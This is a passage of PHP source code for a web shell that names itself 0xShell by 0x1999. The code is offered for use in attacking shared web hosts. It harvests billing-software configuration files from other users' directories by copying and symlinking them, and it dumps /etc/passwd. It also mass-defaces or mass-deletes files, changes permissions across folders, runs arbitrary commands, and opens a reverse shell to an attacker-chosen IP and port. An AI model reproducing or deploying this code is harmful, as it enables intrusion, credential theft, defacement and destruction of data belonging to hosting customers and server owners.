  1729. "/home/$user_cox/public_html/Purchase/submitticket.php" => "WHMCS",
  1730. "/home/$user_cox/public_html/purchase/submitticket.php" => "WHMCS",
  1731. "/home/$user_cox/public_html/ACCOUNT/submitticket.php" => "WHMCS",
  1732. "/home/$user_cox/public_html/Account/submitticket.php" => "WHMCS",
  1733. "/home/$user_cox/public_html/account/submitticket.php" => "WHMCS",
  1734. "/home/$user_cox/public_html/USER/submitticket.php" => "WHMCS",
  1735. "/home/$user_cox/public_html/User/submitticket.php" => "WHMCS",
  1736. "/home/$user_cox/public_html/user/submitticket.php" => "WHMCS",
  1737. "/home/$user_cox/public_html/CLIENTS/submitticket.php" => "WHMCS",
  1738. "/home/$user_cox/public_html/Clients/submitticket.php" => "WHMCS",
  1739. "/home/$user_cox/public_html/clients/submitticket.php" => "WHMCS",
  1740. "/home/$user_cox/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1741. "/home/$user_cox/public_html/Billings/submitticket.php" => "WHMCS",
  1742. "/home/$user_cox/public_html/billings/submitticket.php" => "WHMCS",
  1743. "/home/$user_cox/public_html/MY/submitticket.php" => "WHMCS",
  1744. "/home/$user_cox/public_html/My/submitticket.php" => "WHMCS",
  1745. "/home/$user_cox/public_html/my/submitticket.php" => "WHMCS",
  1746. "/home/$user_cox/public_html/secure/whm/submitticket.php" => "WHMCS",
  1747. "/home/$user_cox/public_html/secure/whmcs/submitticket.php" => "WHMCS",
  1748. "/home/$user_cox/public_html/panel/submitticket.php" => "WHMCS",
  1749. "/home/$user_cox/public_html/clientes/submitticket.php" => "WHMCS",
  1750. "/home/$user_cox/public_html/cliente/submitticket.php" => "WHMCS",
  1751. "/home/$user_cox/public_html/support/order/submitticket.php" => "WHMCS",
  1752. "/home/$user_cox/public_html/bb-config.php" => "BoxBilling",
  1753. "/home/$user_cox/public_html/boxbilling/bb-config.php" => "BoxBilling",
  1754. "/home/$user_cox/public_html/box/bb-config.php" => "BoxBilling",
  1755. "/home/$user_cox/public_html/host/bb-config.php" => "BoxBilling",
  1756. "/home/$user_cox/public_html/Host/bb-config.php" => "BoxBilling",
  1757. "/home/$user_cox/public_html/supportes/bb-config.php" => "BoxBilling",
  1758. "/home/$user_cox/public_html/support/bb-config.php" => "BoxBilling",
  1759. "/home/$user_cox/public_html/hosting/bb-config.php" => "BoxBilling",
  1760. "/home/$user_cox/public_html/cart/bb-config.php" => "BoxBilling",
  1761. "/home/$user_cox/public_html/order/bb-config.php" => "BoxBilling",
  1762. "/home/$user_cox/public_html/client/bb-config.php" => "BoxBilling",
  1763. "/home/$user_cox/public_html/clients/bb-config.php" => "BoxBilling",
  1764. "/home/$user_cox/public_html/cliente/bb-config.php" => "BoxBilling",
  1765. "/home/$user_cox/public_html/clientes/bb-config.php" => "BoxBilling",
  1766. "/home/$user_cox/public_html/billing/bb-config.php" => "BoxBilling",
  1767. "/home/$user_cox/public_html/billings/bb-config.php" => "BoxBilling",
  1768. "/home/$user_cox/public_html/my/bb-config.php" => "BoxBilling",
  1769. "/home/$user_cox/public_html/secure/bb-config.php" => "BoxBilling",
  1770. "/home/$user_cox/public_html/support/order/bb-config.php" => "BoxBilling",
  1771. "/home/$user_cox/public_html/includes/dist-configure.php" => "Zencart",
  1772. "/home/$user_cox/public_html/zencart/includes/dist-configure.php" => "Zencart",
  1773. "/home/$user_cox/public_html/products/includes/dist-configure.php" => "Zencart",
  1774. "/home/$user_cox/public_html/cart/includes/dist-configure.php" => "Zencart",
  1775. "/home/$user_cox/public_html/shop/includes/dist-configure.php" => "Zencart",
  1776. "/home/$user_cox/public_html/includes/iso4217.php" => "Hostbills",
  1777. "/home/$user_cox/public_html/hostbills/includes/iso4217.php" => "Hostbills",
  1778. "/home/$user_cox/public_html/host/includes/iso4217.php" => "Hostbills",
  1779. "/home/$user_cox/public_html/Host/includes/iso4217.php" => "Hostbills",
  1780. "/home/$user_cox/public_html/supportes/includes/iso4217.php" => "Hostbills",
  1781. "/home/$user_cox/public_html/support/includes/iso4217.php" => "Hostbills",
  1782. "/home/$user_cox/public_html/hosting/includes/iso4217.php" => "Hostbills",
  1783. "/home/$user_cox/public_html/cart/includes/iso4217.php" => "Hostbills",
  1784. "/home/$user_cox/public_html/order/includes/iso4217.php" => "Hostbills",
  1785. "/home/$user_cox/public_html/client/includes/iso4217.php" => "Hostbills",
  1786. "/home/$user_cox/public_html/clients/includes/iso4217.php" => "Hostbills",
  1787. "/home/$user_cox/public_html/cliente/includes/iso4217.php" => "Hostbills",
  1788. "/home/$user_cox/public_html/clientes/includes/iso4217.php" => "Hostbills",
  1789. "/home/$user_cox/public_html/billing/includes/iso4217.php" => "Hostbills",
  1790. "/home/$user_cox/public_html/billings/includes/iso4217.php" => "Hostbills",
  1791. "/home/$user_cox/public_html/my/includes/iso4217.php" => "Hostbills",
  1792. "/home/$user_cox/public_html/secure/includes/iso4217.php" => "Hostbills",
  1793. "/home/$user_cox/public_html/support/order/includes/iso4217.php" => "Hostbills",
  1794. );
  1795.  
  1796. foreach ($grab_config as $config => $nama_config) {
  1797. if ($_POST['tipe'] == 'grab') {
  1798. $ambil_config = file_get_contents($config);
  1799. if ($ambil_config == '') {
  1800. } else {
  1801. $file_config = fopen("0xgrab/$user_cox-$nama_config.txt", "w");
  1802. fputs($file_config, $ambil_config);
  1803. }
  1804. }
  1805. if ($_POST['tipe'] == 'grabsym') {
  1806. @symlink($config, "0xsym/" . $user_cox . "-" . $nama_config . ".txt");
  1807. }
  1808. if ($_POST['tipe'] == 'grabsym404') {
  1809. $sym404 = symlink($config, "0xsym404/" . $user_cox . "-" . $nama_config . ".txt");
  1810. if ($sym404) {
  1811. @mkdir("0xsym404/" . $user_cox . "-" . $nama_config . ".txt404", 0777);
  1812. $xsym404 = "Options Indexes FollowSymLinks
  1813. DirectoryIndex jancox.htm
  1814. HeaderName 0x.txt
  1815. Satisfy Any
  1816. IndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble
  1817. IndexIgnore *
  1818. IndexStyleSheet 'https://0x1999.github.io/0xShell/style/melex.css'";
  1819.  
  1820. @file_put_contents("0xsym404/" . $user_cox . "-" . $nama_config . ".txt404/.htaccess", $xsym404);
  1821.  
  1822. @symlink($config, "0xsym404/" . $user_cox . "-" . $nama_config . ".txt404/0x.txt");
  1823.  
  1824. }
  1825.  
  1826. }
  1827.  
  1828. }
  1829. }if ($_POST['tipe'] == 'grab') {
  1830. echo "<center><a href='?dir=$dir/0xgrab'><font color=lime>Done</font></a></center>";
  1831. }
  1832. if ($_POST['tipe'] == 'grabsym404') {
  1833. echo "<center>
  1834. <a href=\"0xsym404/root/\">Root Server</a>
  1835. <br><a href=\"0xsym404/\">Configurations</a></center>";
  1836. }
  1837. if ($_POST['tipe'] == 'grabsym') {
  1838. echo "<center>
  1839. <a href=\"0xsym/root/\">Root Server</a>
  1840. <br><a href=\"0xsym/\">Configurations</a></center>";
  1841. }if ($_POST['tipe'] == 'grabsymv') {
  1842. echo "<center>
  1843. <a href=\"0xsymv/root/\">Root Server</a>
  1844. <br><a href=\"0xsymv/\">Configurations</a></center>";
  1845. }
  1846.  
  1847. } else {
  1848. echo "<form method=\"post\" action=\"\"><center>
  1849. <select class=\"select\" name=\"tipe\" style=\"width: 450px;\" height=\"10\">
  1850. <option value=\"grab\">Config Grab</option>
  1851. <option value=\"grabsym\">Symlink Config</option>
  1852. <option value=\"grabsym404\">Symlink Config 404</option>
  1853. <option value=\"grabsymv\">VHosts Symlink Config</option>
  1854. </center></select>
  1855. <br>\n";
  1856. if (!$etcpasswd) {
  1857. echo "<textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  1858. for ($uid = 0; $uid < 60000; $uid++) {
  1859. $ara = posix_getpwuid($uid);
  1860. if (!empty($ara)) {
  1861. while (list($key, $val) = each($ara)) {
  1862. print "$val:";
  1863. }
  1864. print "\n";
  1865. }
  1866. }
  1867. echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
  1868. } else {
  1869. echo "<textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  1870. echo $etcpasswd;
  1871. echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
  1872.  
  1873. }
  1874. }
  1875.  
  1876. } elseif (isset($_GET['do']) && ($_GET['do'] == 'cekjum')) {
  1877. echo '<form method="post" action="" style="float: left;">
  1878. Dir :
  1879. <input size="30" name="cekjum" height="10" type="text"><input name="submit" value=">>" type="submit">
  1880. </form><br><br>';
  1881. if ($_POST) {
  1882. echo cekjum($_REQUEST['cekjum']);
  1883. } else {
  1884. echo cekjum($_GET['cekjum']);
  1885. }
  1886. } elseif (isset($_GET['do']) && ($_GET['do'] == 'jump')) {
  1887. $i = 0;
  1888. echo "<pre><div class='margin: 5px auto;'>";
  1889. $etc = $etcpasswd;
  1890.  
  1891. if (!$etc) {
  1892. echo "<font color=red>Can't read /etc/passwd</font>";
  1893. } else {
  1894. preg_match_all('/(.*?):x:/', $etc, $user_jumping);
  1895. foreach ($user_jumping[1] as $userjum) {
  1896. $userjumdir = "/home/$userjum/public_html";
  1897. $perm = permissions($userjumdir);
  1898. $perm = w($userjumdir, $perm);
  1899.  
  1900. if (is_readable($userjumdir)) {
  1901. $i++;
  1902. $jrw = "<a>[<font color=lime>R</font>] [$perm] </a><a href='?dir=$userjumdir'><font color=gold>$userjumdir</font></a> <a href='?do=cekjum&cekjum=$userjumdir' target='_blank'>Check</a><br>";
  1903. if (is_writable($userjumdir)) {
  1904. $jrw = "<a>[<font color=lime>RW</font>] [$perm] </a><a href='?dir=$userjumdir'><font color=gold>$userjumdir</font></a> <a href='?do=cekjum&cekjum=$userjumdir' target='_blank'>Check</a><br>";
  1905. }
  1906. echo $jrw;
  1907. }
  1908. }
  1909. }
  1910. if ($i == 0) {
  1911. } else {
  1912. echo "<br>Total ada " . $i . " Kimcil di " . gethostbyname($_SERVER['HTTP_HOST']) . "";
  1913. }
  1914. echo "</div></pre>";
  1915. } elseif (isset($_GET['do']) && ($_GET['do'] == 'setting')) {
  1916. echo "<center>
  1917. <h1>Manual Setting Area</h1>
  1918. <form method='post'>
  1919. <br><input type='submit' value='RESET ALL' name='reset'><br>
  1920. etc/passwd<br>
  1921. <textarea style='background:black;outline:none;' name='etcpasswd' rows='10' cols='67'>$etcpasswd</textarea>
  1922. <input type='submit' value='Save'>
  1923. <br>etc/trueuserowners<br>
  1924. <textarea style='background:black;outline:none;' name='etctrueuserowners' rows='10' cols='67'>$etctrueuserowners</textarea>
  1925. <input type='submit' value='Save'>
  1926. <br>etc/named.conf<br>
  1927. <textarea style='background:black;outline:none;' name='etcnamedconf' rows='10' cols='67'></textarea>
  1928. <input type='submit' value='Save'>
  1929. <br>configlist<br>
  1930. <textarea style='background:black;outline:none;' name='configlist' rows='10' cols='67'></textarea>
  1931. <br><input type='submit' value='Save'>
  1932. </form></center>";
  1933. // $etctrueuserowners
  1934. if ($_POST['etcpasswd']) {
  1935. $_SESSION['etcpasswd'] = $_POST['etcpasswd'];
  1936. }
  1937. if ($_POST['etctrueuserowners']) {
  1938. $_SESSION['etctrueuserowners'] = $_POST['etctrueuserowners'];
  1939. }
  1940. if ($_POST['etcnamedconf']) {
  1941. $_SESSION['etcnamedconf'] = $_POST['etcnamedconf'];
  1942. }
  1943. if ($_POST['configlist']) {
  1944. $_SESSION['configlist'] = $_POST['configlist'];
  1945. }
  1946. if ($_POST['reset']) {
  1947. unset($_SESSION['etctrueuserowners']);
  1948. unset($_SESSION['etcpasswd']);
  1949. unset($_SESSION['etcnamedconf']);
  1950. unset($_SESSION['configlist']);
  1951. }
  1952.  
  1953. } elseif (isset($_GET['do']) && ($_GET['do'] == 'mass_deface')) {
  1954. echo "<center><form action=\"\" method=\"post\">\n";
  1955. $dirr = $_POST['d_dir'];
  1956. $index = $_POST["script"];
  1957. $index = str_replace('"', "'", $index);
  1958. $index = stripslashes($index);
  1959. function edit_file($file, $index)
  1960. {
  1961. if (is_writable($file)) {
  1962. clear_fill($file, $index);
  1963. echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  1964. } else {
  1965. echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  1966. }
  1967. }
  1968. function hapus_massal($dir, $namafile)
  1969. {
  1970. if (is_writable($dir)) {
  1971. $dira = scandir($dir);
  1972. foreach ($dira as $dirb) {
  1973. $dirc = "$dir/$dirb";
  1974. $lokasi = $dirc . '/' . $namafile;
  1975. if ($dirb === '.') {
  1976. if (file_exists("$dir/$namafile")) {
  1977. unlink("$dir/$namafile");
  1978. }
  1979. } elseif ($dirb === '..') {
  1980. if (file_exists("" . dirname($dir) . "/$namafile")) {
  1981. unlink("" . dirname($dir) . "/$namafile");
  1982. }
  1983. } else {
  1984. if (is_dir($dirc)) {
  1985. if (is_writable($dirc)) {
  1986. if (file_exists($lokasi)) {
  1987. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  1988. unlink($lokasi);
  1989. $idx = hapus_massal($dirc, $namafile);
  1990. }
  1991. }
  1992. }
  1993. }
  1994. }
  1995. }
  1996. }
  1997. function clear_fill($file, $index)
  1998. {
  1999. if (file_exists($file)) {
  2000. $handle = fopen($file, 'w');
  2001. fwrite($handle, '');
  2002. fwrite($handle, $index);
  2003. fclose($handle);}}
  2004.  
  2005. function gass()
  2006. {
  2007. global $dirr, $index;
  2008. chdir($dirr);
  2009. $me = str_replace(dirname(__FILE__) . '/', '', __FILE__);
  2010. $files = scandir($dirr);
  2011. $notallow = array(".htaccess", "error_log", "_vti_inf.html", "_private", "_vti_bin", "_vti_cnf", "_vti_log", "_vti_pvt", "_vti_txt", "cgi-bin", ".contactemail", ".cpanel", ".fantasticodata", ".htpasswds", ".lastlogin", "access-logs", "cpbackup-exclude-used-by-backup.conf", ".cgi_auth", ".disk_usage", ".statspwd", "..", ".");
  2012. sort($files);
  2013. $n = 0;
  2014. foreach ($files as $file) {
  2015. if ($file != $me && is_dir($file) != 1 && !in_array($file, $notallow)) {
  2016. echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  2017. edit_file($file, $index);
  2018. flush();
  2019. $n = $n + 1;
  2020. }
  2021. }
  2022. echo "<br>";
  2023. echo "<center><br><h3>$n Kali Anda Telah Ngecrot Disini </h3></center><br>";
  2024. }
  2025. function ListFiles($dirrall)
  2026. {
  2027.  
  2028. if ($dh = opendir($dirrall)) {
  2029.  
  2030. $files = array();
  2031. $inner_files = array();
  2032. $me = str_replace(dirname(__FILE__) . '/', '', __FILE__);
  2033. $notallow = array($me, ".htaccess", "error_log", "_vti_inf.html", "_private", "_vti_bin", "_vti_cnf", "_vti_log", "_vti_pvt", "_vti_txt", "cgi-bin", ".contactemail", ".cpanel", ".fantasticodata", ".htpasswds", ".lastlogin", "access-logs", "cpbackup-exclude-used-by-backup.conf", ".cgi_auth", ".disk_usage", ".statspwd", "Thumbs.db");
  2034. while ($file = readdir($dh)) {
  2035. if ($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow)) {
  2036. if (is_dir($dirrall . "/" . $file)) {
  2037. $inner_files = ListFiles($dirrall . "/" . $file);
  2038. if (is_array($inner_files)) {
  2039. $files = array_merge($files, $inner_files);
  2040. }
  2041.  
  2042. } else {
  2043. array_push($files, $dirrall . "/" . $file);
  2044. }
  2045. }
  2046. }
  2047.  
  2048. closedir($dh);
  2049. return $files;
  2050. }
  2051. }
  2052. function gass_all()
  2053. {
  2054. global $index;
  2055. $dirrall = $_POST['d_dir'];
  2056. foreach (ListFiles($dirrall) as $key => $file) {
  2057. $file = str_replace('//', "/", $file);
  2058. echo "<center><strong>$file</strong> ===>";
  2059. edit_file($file, $index);
  2060. flush();
  2061. }
  2062. $key = $key + 1;
  2063. echo "<center><br><h3>$key Kali Anda Telah Ngecrot Disini </h3></center><br>";}
  2064. function chmod_all()
  2065. {
  2066. $chmod = $_POST['chmod'];
  2067. $dirrall = $_POST['d_dir'];
  2068. foreach (ListFiles($dirrall) as $key => $file) {
  2069. $file = str_replace('//', "/", $file);
  2070. echo "<center><strong>$file</strong> ===>";
  2071. chmod($file, $chmod);
  2072. flush();
  2073. }
  2074. $key = $key + 1;
  2075. echo "<center><br><h3>$key telah ngentu chmod disini</h3></center><br>";}
  2076. function sabun_massal($dir, $namafile, $isi_script)
  2077. {
  2078. if (is_writable($dir)) {
  2079. $dira = scandir($dir);
  2080. foreach ($dira as $dirb) {
  2081. $dirc = "$dir/$dirb";
  2082. $lokasi = $dirc . '/' . $namafile;
  2083. if ($dirb === '.') {
  2084. file_put_contents($lokasi, $isi_script);
  2085. } elseif ($dirb === '..') {
  2086. file_put_contents($lokasi, $isi_script);
  2087. } else {
  2088. if (is_dir($dirc)) {
  2089. if (is_writable($dirc)) {
  2090. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  2091. file_put_contents($lokasi, $isi_script);
  2092. $idx = sabun_massal($dirc, $namafile, $isi_script);
  2093. }
  2094. }
  2095. }
  2096. }
  2097. }
  2098. }
  2099. if ($_POST['mass'] == 'onedir') {
  2100. echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  2101. $ini = "http://";
  2102. $mainpath = $_POST[d_dir];
  2103. $dir = opendir("$mainpath");
  2104. $code = base64_encode($_POST[script]);
  2105. $indx = base64_decode($code);
  2106. while ($row = readdir($dir)) {
  2107. if($_POST["random_name"]){
  2108. $file = rand(1000000,9999999)."_".$_POST[d_file];
  2109. }else{
  2110. $file = $_POST[d_file];
  2111. }
  2112. $start = @fopen("$row/$file", "w+");
  2113. $finish = @fwrite($start, $indx);
  2114. if ($finish) {
  2115. echo "$ini$row/$file\n";
  2116. }
  2117. }
  2118. echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  2119. $mainpath = $_POST[d_dir];
  2120. $dir = opendir("$mainpath");
  2121. $code = base64_encode($_POST[script]);
  2122. $indx = base64_decode($code);
  2123. while ($row = readdir($dir)) {
  2124. if($_POST["random_name"]){
  2125. $file = $_POST[d_file]."_".rand(1000000,9999999);
  2126. }else{
  2127. $file = $_POST[d_file];
  2128. }
  2129. $start = @fopen("$row/$file", "w+");
  2130. $finish = @fwrite($start, $indx);
  2131. if ($finish) {echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>';}
  2132. }
  2133.  
  2134. } elseif ($_POST['mass'] == 'sabunkabeh') {gass();} elseif ($_POST['mass'] == 'hapusmassal') {hapus_massal($_POST['d_dir'], $_POST['d_file']);} elseif ($_POST['mass'] == 'sabunmematikan') {gass_all();} elseif ($_POST['mass'] == 'chmodkabeh') {chmod_all();} elseif ($_POST['mass'] == 'massdeface') {
  2135. echo "<div style='margin: 5px auto; padding: 5px'>";
  2136. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  2137. echo "</div>";} else {
  2138. echo "
  2139. <center><font style='text-decoration: underline;'>
  2140. Select Type:<br>
  2141. </font>
  2142. <select class=\"select\" name=\"mass\" style=\"width: 450px;\" height=\"10\">
  2143. <option value=\"onedir\">Mass Deface 1 Dir</option>
  2144. <option value=\"massdeface\">Mass Deface ALL Dir</option>
  2145. <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  2146. <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  2147. <option value=\"chmodkabeh\">Chmod Massal</option>
  2148. <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  2149. <font style='text-decoration: underline;'>Folder:</font><br>
  2150. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  2151. <font style='text-decoration: underline;'>Filename:</font><br>
  2152. <input type='text' name='d_file' value='0x.php' style='width: 450px;' height='10'><input type='checkbox' name='random_name' value='random name'><br>
  2153. <font style='text-decoration: underline;'>Index File:</font><br>
  2154. <textarea name='script' style='width: 450px; height: 200px;'>Hacked By 0x1999</textarea><br>
  2155. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  2156. </form></center>";
  2157. }
  2158. } elseif (isset($_GET['do']) && ($_GET['do'] == 'bc')) {
  2159. echo '
  2160. <div id="back">
  2161. <h2>Back Connect</h2>
  2162. <p>Back connect will allow you to enter system commands remotely.</p>
  2163. <p>
  2164. <table>
  2165. <form action="" method="post">
  2166. <tr ><td>IP Address: </td><td><input type="textbox" name="ip" style="border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;"></td></tr>
  2167. <tr ><td>Port: </td><td><input type="textbox" name="port" style="border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;"></td></tr>
  2168. <tr ><td><input type="submit" name="bind" value="Open Connection" style="border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;"></td></tr>
  2169. </form>
  2170. </table>';
  2171. if (isset($_POST['bind'])) {
  2172. echo "<p>Attempting Connection...</p>";
  2173. $ip = $_POST['ip'];
  2174. $port = $_POST['port'];
  2175. $sockfd = fsockopen($ip, $port, $errno, $errstr);
  2176. if ($errno != 0) {
  2177. echo "<font color='red'>$errno : $errstr</font>";
  2178. } else if (!$sockfd) {
  2179. $result = "<p>Unexpected error has occured, connection may have failed.</p>";
  2180. } else {
  2181. fputs($sockfd, "
  2182. \n{################################################################}
  2183. \n..:: 0xShell v1 - Coded By 0x1999 ::..
  2184. \n
  2185. \n=> Backconnect
  2186. \n=> Back
  2187. \n
  2188. \n{################################################################}\n\n");
  2189. $dir = shell_exec("pwd");
  2190. $sysinfo = shell_exec("uname -a");
  2191. $time = Shell_exec("time");
  2192. $len = 1337;
  2193. fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n");
  2194. while (!feof($sockfd)) {
  2195. $cmdPrompt = '[0x]#:> ';
  2196. fputs($sockfd, $cmdPrompt);
  2197. $command = fgets($sockfd, $len);
  2198. fputs($sockfd, "\n" . shell_exec($command) . "\n\n");
  2199. }
  2200. fclose($sockfd);
  2201. }
  2202. }
  2203. echo "</p></div>";
  2204.  
  2205. } elseif (isset($_GET['act']) && ($_GET['act'] == 'edit')) {
  2206.  
  2207. if (isset($_POST['save'])) {
  2208. $file = $_POST['saveas'];
  2209. $content = magicboom($_POST['content']);
  2210. if ($filez = @fopen($file, "w")) {
  2211. $time = date("d-M-Y H:i", time());
  2212. if (@fwrite($filez, $content)) {
  2213. $msg = "file saved <span class=\"gaya\">@</span> " . $time;
  2214. } else {
  2215. $msg = "failed to save";
  2216. }
  2217.  
  2218. @fclose($filez);
  2219. } else {
  2220. $msg = "permission denied";
  2221. }
  2222.  
  2223. }
  2224. if (!isset($file)) {
  2225. $file = $_GET['file'];
  2226. }
  2227.  
  2228. if ($filez = @fopen($file, "r")) {
  2229. $content = "";
  2230. while (!feof($filez)) {
  2231. $content .= htmlentities(str_replace("''", "'", fgets($filez)));
  2232. }
  2233. @fclose($filez);
  2234. }
  2235. ?>
  2236. <form action="" method="post">
  2237. <table class="cmdbox">
  2238. <tr>
  2239. <td colspan="2">
  2240. <textarea class="output" name="content">
  2241. <?php echo $content; ?>
  2242. </textarea>
  2243. <tr>
  2244. <td colspan="2">Save as <input id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> &nbsp;
  2245. <?php echo $msg; ?>
  2246. </td>
  2247. </tr>
  2248. </table>
  2249. </form>
  2250. <?php
  2251. } elseif (isset($_GET['do']) && ($_GET['do'] == 'serverinfo')) {
  2252.  
  2253. $s_safemode = ini_get("safe_mode");
  2254. if ($s_safemode = true) {$s_safemode = "<span class='enabled'>[ON";} else { $s_safemode = "<span class='disabled'>[OFF";}
  2255. if (extension_loaded('curl')) {$curls = "<span class='enabled'>[ON]</span>";} else { $curls = "<span class='disabled'>[OFF]</span>";}
  2256. echo "Server Port: " . $_SERVER['SERVER_PORT'] . "<br /><br />HTTP Connection: " . $_SERVER['HTTP_CONNECTION'] . "<br /><br />Operating System: " . php_uname() . "<br /><br />";
  2257. if (get_magic_quotes_gpc()) {echo "Magic Quotes: <span class='enabled'>[ENABLED]</span><br /><br />";} else {echo "Magic Quotes: <span class='disabled'>[DISABLED]</span><br /><br />";}
  2258. echo "PHP Version: " . phpversion() . "<br /><br />Safe Mode: " . $s_safemode . "]</span><br /><br />Curl: " . $curls . "<br /><br />Accept Encoding: " . $_SERVER['HTTP_ACCEPT_ENCODING'] . "<br /><br />Admin: " . $_SERVER['SERVER_ADMIN'] . "<br /><br /><strong>Disabled Functions: </strong>";
  2259. if (!empty($disabled)) {
  2260. foreach ($disabled as $functionsdis) {
  2261. echo $functionsdis . ", ";
  2262. }
  2263. } else {
  2264. echo "none";
  2265. }
  2266. echo "<br /><br /><strong>/etc/passwd: </strong>";
  2267. if (is_readable("/home/etc/passwd")) {
  2268. echo "<span style='color:green;'>Readable</span>";
  2269. } else {
  2270. echo "<span style='color:red;'>Unreadable</span>";
  2271. }
  2272. } elseif (isset($_GET['do']) && ($_GET['do'] == 'cmd')) {
  2273. if ($_POST['do_cmd']) {
  2274. echo "<textarea class='area' rows='15' cols='60'>" . exe($_POST['cmd']) . "</textarea>";
  2275. }
  2276. } elseif (isset($_GET['do']) && ($_GET['do'] == 'about')) {
  2277.  
  2278. echo "
  2279. <h4>Information</h4>
  2280. <p>$shell_name v$shell_version Ngelu Edition - coded by 0x1999.</p>";
  2281.  
  2282. ?>
  2283. <ul>
  2284. <li>Appearance C6 Shell.</li>
  2285. <li>File Manager By IndoXploit.</li>
  2286. <li>Thanks.</li>
  2287. </ul>
  2288. <br /><br />
  2289. <?php
  2290. } else {
  2291. function GetFileSize($file)
  2292. {
  2293. if (!is_dir($file)) {
  2294. return round(filesize($file) / 1024, 2) . " Kb";
  2295. } else {
  2296. return "Not Availible";
  2297. }
  2298.  
  2299. }
  2300.  
  2301. function LastModified($file)
  2302. {
  2303. return date("F d Y g:i:s", filemtime("$file"));}
  2304.  
  2305. ////////////
  2306.  
  2307. if (is_dir($dir) == true) {
  2308. echo '<table cellspacing="0" cellpadding="0"><tr><td class="TableHeader_Name"> FileName</td><td class="TableHeader">Filetype</a></td><td class="TableHeader">Size</td><td class="TableHeader">Permisions</td><td class="TableLast">Last Modified</td><td class="TableHeaderoptions"> Options</td></tr>';
  2309. $scandir = scandir($dir);
  2310. foreach ($scandir as $dirx) {
  2311. $dtype = @filetype("$dir/$dirx");
  2312. $dtime = date("F d Y g:i:s", @filemtime("$dir/$dirx"));
  2313. if (!is_dir("$dir/$dirx")) {
  2314. continue;
  2315. }
  2316.  
  2317. if ($dirx === '..') {
  2318. $href = dirname($dir);
  2319. } elseif ($dirx === '.') {
  2320. $href = $dir;
  2321. } else {
  2322. $href = $dir . '/' . $dirx;
  2323. }
  2324. if ($dirx == '.') {
  2325. $act_dir = "<span id=\"titik1\">
  2326. <a href='?act=edit&dir=$dir&file=$dir/newfile.php'>newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>
  2327. <form action=\"?act=newfolder&dir=$dir\" method=\"post\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  2328.  
  2329. <input class=\"inputz\" style=\"width:130px;\" type=\"text\" name=\"newfolder\" placeholder=\"new_folder\" />
  2330. <input class=\"inputzbut\" type=\"submit\" name=\"new_save_folder\" style=\"width:35px;\" value=\"Go !\" />
  2331. </form>";
  2332. } elseif ($dirx == '..') {
  2333. $act_dir = "<span id=\"titik2\"><a href='?act=edit&dir=$dir&file=$dir/newfile.php'>newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
  2334. <form action=\"?act=newfolder&dir=$dir\" method=\"post\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  2335.  
  2336. <input class=\"inputz\" style=\"width:130px;\" type=\"text\" name=\"newfolder\" placeholder=\"new_folder\" />
  2337. <input class=\"inputzbut\" type=\"submit\" name=\"new_save_folder\" style=\"width:35px;\" value=\"Go !\" />
  2338. </form>";
  2339. } else {
  2340. $act_dir = "<a href=\"javascript:tukar('" . clearspace($dirx) . "_link','" . clearspace($dirx) . "_form');\">rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  2341. }
  2342. echo "<tr class='filetr'>";
